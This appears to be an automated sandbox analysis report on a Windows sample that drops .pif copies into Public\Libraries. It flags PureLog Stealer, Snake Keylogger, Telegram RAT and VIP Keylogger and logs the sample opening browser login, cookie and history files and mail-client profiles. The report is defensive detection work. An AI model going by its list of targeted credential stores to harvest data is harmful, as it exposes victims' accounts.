Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$uu%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,u\*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q -s%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpUT*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$-h*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<F
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPnC*

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02935A78
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: GetLocaleInfoA,	0_2_0293A790
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: GetLocaleInfoA,	0_2_0293A744
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02935B84
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: GetLocaleInfoA,	3_2_00417A20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: GetLocaleInfoA,	3_1_00417A20
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_028E5A78
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: GetLocaleInfoA,	4_2_028EA790
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_028E5B83
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: GetLocaleInfoA,	7_2_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_0293918C GetLocalTime,

0_2_0293918C

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_0293B70C GetVersionExA,

0_2_0293B70C

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 3808, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
